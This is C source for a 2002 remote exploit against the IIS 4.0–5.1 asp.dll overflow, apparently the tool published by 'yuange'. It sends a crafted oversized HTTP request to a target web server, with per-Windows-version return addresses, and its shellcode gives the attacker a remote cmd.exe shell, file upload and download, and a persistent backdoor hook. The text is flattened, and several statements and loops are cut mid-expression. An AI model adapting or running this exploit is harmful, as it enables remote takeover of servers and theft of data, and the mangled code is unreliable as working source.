/* aspcode.c ver1.0 iis4.0、iis5.0、iis5.1 asp.dll overflow program copy by yuange 2002.4.24 */ #include #include #include #include #pragma comment(lib,"ws2_32") //#define RETEIPADDR eipwin2000 #define FNENDLONG 0x08 #define NOPCODE 0x90 #define NOPLONG 0x50 #define BUFFSIZE 0x20000 #define PATHLONG 0x12 #define RETEIPADDRESS 0x468 #define SHELLBUFFSIZE 0x800 #define SHELLFNNUMS 14 #define DATABASE 0x61 #define DATAXORCODE 0x55 #define LOCKBIGNUM 19999999 #define LOCKBIGNUM2 13579139 #define MCBSIZE 0x8 #define MEMSIZE 0xb200 #define SHELLPORT 0x1f90 //0x1f90=8080 #define WEBPORT 80 void shellcodefnlock(); void shellcodefnlock2(); void shellcodefn(char *ecb); void shellcodefn2(char *ecb); void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); void iisput(int fd,char *str); void iisget(int fd,char *str); void iiscmd(int fd,char *str); void iisreset(); void iisdie(); void iishelp(); int newrecv(int fd,char *buff,int size,int flag); int newsend(int fd,char *buff,int size,int flag); int xordatabegin; int lockintvar1,lockintvar2; char lockcharvar; int main(int argc, char **argv) { char *server; char *str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0" "\x09""asp.dll""\x0""HttpExtensionProc""\x0" "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0""xordatareset""\x0" "strend"; // char buff0[]="TRACK / HTTP/1.1\nHOST:"; char buff1[]="GET /"; char buff2[]="default.asp"; char *buff2add; char buff3[]="?!!ko "; char buff4[]=" HTTP/1.1 \nHOST:"; char buff5[]="\nContent-Type: application/x-www-form-urlencoded"; char buff51[]="\nTransfer-Encoding:chunked"; char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // 0x80000000+MEMSIZE-1 char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff char buff7[]= "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01"; char buff11[]= "\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01"; char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01"; char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"; char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90"; /* char buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01"; char buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01"; char buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01"; char buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01"; char buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01"; char buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01"; */ char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char SRLF[]="\x0d\x0a\x00\x00"; char *eipexceptwin2000add; char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; ret address char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; ret address char eipexceptwin2000[]="\x80\x70\x97\x74"; // char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78"; // call ebx address char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78"; char eipexceptwin2000sp2[]="\x02\xbc\x01\x78"; // char eipexceptwin2000[]="\x0B\x08\x5A\x68"; // char eipexceptwin2000[]="\x32\x8d\x9f\x74"; char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; ret address // char eipexceptwinnt[] ="\x2e\x01\x01\x78"; // call esi address // char eipexcept2[]="\xd0\xae\xdc\x77"; // char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[BUFFSIZE]; char shellcodebuff2[BUFFSIZE]; struct sockaddr_in s_in2,s_in3; struct hostent *he; char *shellcodefnadd,*chkespadd; unsigned int sendpacketlong,buff2long,shelladd,packlong; int i,j,k,l,strheadlong; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int result; fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 ."); fprintf(stderr,"\n copy by yuange 2002.4.24."); fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net ."); fprintf(stderr,"\n welcome to http://www.nsfocus.com ."); fprintf(stderr,"\n usage: %s [aspfile] [webport] [winxp] \n", argv[0]); buff2add=buff2; if(argc <2){ fprintf(stderr,"\n please enter the web server:"); gets(recvbuff); for(i=0;i5){ if(strcmp(argv[5],"cn")==0) { eipexceptwin2000add=eipexceptwin2000cn; printf("\n For the cn system.\n"); } if(strcmp(argv[5],"sp0")==0) { eipexceptwin2000add=eipexceptwin20002; printf("\n For the sp0 system.\n"); } if(strcmp(argv[5],"msvcrt")==0) { eipexceptwin2000add=eipexceptwin2000msvcrt; printf("\n Use msvcrt.dll JMP to shell.\n"); } if(strcmp(argv[5],"sp2")==0) { eipexceptwin2000add=eipexceptwin2000sp2; printf("\n Use sp2 msvcrt.dll JMP to shell.\n"); } } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } /* if(argc>4){ offset=atoi(argv[4]); } // OVERADD+=offset; // packlong=0x10000-offset+0x8; if(offset<-0x20||offset>0x20){ fprintf(stderr,"\n offset error !offset -32 --- +32 ."); gets(buff); exit(1); } */ if(argc <2){ // WSACleanup( ); // exit(1); } else server = argv[1]; for(i=0;ih_addr, 4); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(port==0) port=WEBPORT; fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) { closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); gets(buff); exit(1); } _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } /* shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } */ memset(buff,NOPCODE,BUFFSIZE); /* strcpy(buff,buff0); if(argc>6) strcat(buff,argv[6]); else strcat(buff,server); strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n"); strcat(buff,buff1); */ strcpy(buff,buff1); strheadlong=strlen(buff); OVERADD+=strheadlong-1; if(argc>2) buff2add=argv[2]; for(;;++buff2add){ temp=*buff2add; if(temp!='\\'&&temp!='/') break; } // printf("\nfile:%s",buff2add); buff2long=strlen(buff2add); strcat(buff,buff2add); // fprintf(stderr,"\n offset:%d\n",offset); // offset+=strheadlong-strlen(buff1); /* for(i=0x404;i<=0x500;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwin2000add,4); } if(argc>5){ if(strcmp(argv[5],"sp2")==0) { memcpy(buff+offset+i,"\x58",1); } } for(i=0x220;i<=0x380;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwinnt,4); } for(i=0x580;i<=0x728;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwinnt,4); } */ // winnt 0x2cc or 0x71c win2000 0x130 or 0x468 // memcpy(buff+offset+i+8,exceptret,strlen(exceptret)); shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(shellcodebuff2,NOPCODE,BUFFSIZE); i=0x1000; memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=BUFFSIZE;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } // k+=0x memcpy(shellcodebuff,shellcodefnadd,k); //j); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(j=0;j<0x400;++j){ if(memcmp(str+j,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,j); sendpacketlong=k+j; for(k=0;k<=0x200;++k){ if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break; } for(j=0;j4&&strcmp(argv[4],"apache")==0){ strcat(buff," "); } else strcat(buff,buff3); printf("\n packetlong:0x%x\n",sendpacketlong); strcat(buff,buff4); if(argc>6) strcat(buff,argv[6]); else strcat(buff,server); strcat(buff,buff5); if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," "); else strcat(buff,shellcodebuff2); // strcat(buff,buff51); if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) { printf("\n for %s system\n",argv[4]); strcat(buff,buff61); } else strcat(buff,buff6); // printf("\n send buff:\n%s",buff); /* i=strlen(buff); memset(buff+i,'a',0xc000); memset(buff+i+0xc000-strlen(buff7),0,1); strcat(buff+i+0xc000-0x10-strlen(buff7),buff7); */ // strcpy(buff8,buff7); /* temp=buff7[5]; temp-=offset*0x10; buff7[5]=temp; i=*(int *)(buff7+4)+2; printf("\nSEH=0x%x\n",i); */ /* for(i=0;i<8;++i){ temp=buff7[i]; printf("%2x",temp); } */ /* for(i=0;i<0xc000/0x10;++i){ strcat(buff,buff7); } */ // printf("\nbuff=%s\n",buff); // strcat(buff,"\r\n"); // printf("\n send buff:\n%s",buff); // strcpy(buff+OVERADD+NOPLONG,shellcode); sendpacketlong=strlen(buff); // printf("buff:\n%s",buff+0x10000); /* #ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret } #endif */ lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; xordatabegin=0; for(i=0;i<1;++i){ j=sendpacketlong; // buff[0x2000]=0; fprintf(stderr,"\n send packet %d bytes.",j); // gets(buff); send(fd,buff,j,0); buff7[0]=MCBSIZE; j=MEMSIZE+0x10; i=0; if(argc>4&&strcmp(argv[4],"winxp")==0) { j=0x18; i=8; } for(k=0;i<0xc000;i+=0x10){ if(i>=j) { k=((i-j)/(MCBSIZE*8)); if(k<=6){ memcpy(buff7+0x8,buff10,8); buff7[0x8]=buff8[k]; buff7[0xc]=buff9[k]; } else memcpy(buff7,buff11,0x10); } memcpy(buff+i,buff7,0x10); } if(argc>4&&strcmp(argv[4],"apache")==0){ for(k=0xb000;k<=0xc000;k+=2) { memset(buff+k,0x0d,1); memset(buff+k+1,0x0a,1); } buff[0xc000]=0; // for(k=0;k<0x10;++k) send(fd,buff,0xc000,0); // printf("\nbuff:%s\n",buff); } else send(fd,buff,0xc000,0); k=0; ioctlsocket(fd, FIONBIO, &k); j=0; while(j==0){ k=newrecv(fd,recvbuff,BUFFSIZE,0); if(k>=8&&strstr(recvbuff,"XORDATA")!=0) { xordatabegin=1; fprintf(stderr,"\n ok!recv %d bytes\n",k); recvbuff[k]=0; // printf("\n recv:%s",recvbuff); // for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int *)(recvbuff+8+4*j)); k=-1; j=1; } if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } } k=1; ioctlsocket(fd, FIONBIO, &k); // fprintf(stderr,"\n now begin: \n"); /* for(i=0;i=8&&strstr(buff,"XORDATA")!=0) { xordatabegin=1; k=-1; } if(k>0){ // fprintf(stderr,"recv %d bytes",k); /* if(xordatabegin==1){ for(i=0;i0) { i=0; ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0) { for(k=0;k=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu ff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe stradd2=Buff+5; Buff[lBytesRead]=0; goto iiscmd; } if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Bu ff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){ lBytesRead=0x0c; writeclient(ConnID,stradd+0x11,&lBytesRead,0); lockintvar1=shelllocknum%LOCKBIGNUM; lockintvar2=lockintvar1; lBytesRead=0; } if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu ff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe *(int *)(dooradd-0x0c)=0; Sleepadd(0x7fffffff); _asm{ mov eax,0 mov esp,0 jmp eax } } if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3] ==' ') { l=*(int *)(Buff+4); // WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+ GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 ); k=GetLastErroradd(); i=0; while(l>0){ lBytesRead=SHELLBUFFSIZE; k=readclient(ConnID,Buff,&lBytesRead); if(k==1){ if(lBytesRead>0){ for(k=0;k0) WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); // else Sleepadd(010); } // if(i>100) l=0; } else { Sleepadd(0100); ++i; } if(i>10000) l=0; } CloseHandleadd(fpt); l=0; } else{ if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3] ==' '){ // fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTIN G,FILE_ATTRIBUTE_NORMAL,0); fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); Sleepadd(100); l=GetFileSizeadd(fpt,&k); *(int *)Buff='ezis'; //size *(int *)(Buff+4)=l; lBytesRead=8; for(i=0;i0){ k=SHELLBUFFSIZE; ReadFileadd(fpt,Buff,k,&k,0); if(k>0){ for(i=0;i100) l=0; } CloseHandleadd(fpt); l=0; } else l=1; } } if(k!=1){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe k=GetLastErroradd(); while(k==0x2746){ if(thedoor==1) goto asmreturn; Sleepadd(0x7fffffff); //僵死 } } else{ WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); // Sleepadd(1000); } } } die: goto die ; _asm{ asmreturn: mov eax,HSE_STATUS_SUCCESS leave ret 04 door: push eax mov eax,[esp+0x08] mov eax,[eax+0x64] mov eax,[eax] cmp eax,'ok!!' jnz jmpold pop eax push 0x12345678 //dooradd-0x13 ret jmpold: pop eax push 0x12345678 //dooradd-0xc ret //1 jmp door //2 getdoorcall: call getdooradd //5 getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 //stradd-0xe xor eax,eax //2 ret //1 execptprogram: jmp errprogram //2 bytes stradd-7 nextcall: call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char *calladd; for(i=0;i0){ size=0x800; ReadFile(fpt,buff,size,&size,NULL); if(size>0){ filesize-=size; newsend(fd,buff,size,0); // Sleep(0100); } } // size=filesize; // ReadFile(fpt,buff,size,&size,NULL); // if(size>0) send(fd,buff,size,0); CloseHandle(fpt); j=1; ioctlsocket(fd, FIONBIO, &j); printf("\n put file ok!\n"); Sleep(1000); } void iisget(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i0){ buff[i]=0; if(memcmp(buff,"size",4)==0){ filesize=*(int *)(buff+4); j=100; } else { /* for(j=0;j1000) i=0; } printf("\n file %d bytes %d\n",filesize,i); if(i>8){ i-=8; filesize-=i; WriteFile(fpt,buff+8,i,&i,NULL); } while(filesize>0){ size=newrecv(fd,buff,0x800,0); if(size>0){ filesize-=size; WriteFile(fpt,buff,size,&size,NULL); } else { if(size==0) { printf("\n ftp close \n "); } else { printf("\n Sleep(100)"); Sleep(100); } } } CloseHandle(fpt); printf("\n get file ok!\n"); j=1; ioctlsocket(fd, FIONBIO, &j); } void iisreset(int fd,char *str){ char buff[0x2000]; int i,j; printf("\nreset xor data.\n"); Sleep(1000); j=0; ioctlsocket(fd, FIONBIO, &j); strcpy(buff,"reset"); newsend(fd,buff,strlen(buff),0); Sleep(1000); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; while(1){ j=recv(fd,buff,0x2000,0); if(j>0){ buff[j]=0; for(i=0;i0){ buff[k]=0; if(strstr(buff,"XORDATA")!=0) { xordatabegin=1; for(i=strstr(buff,"XORDATA")-buff+8;i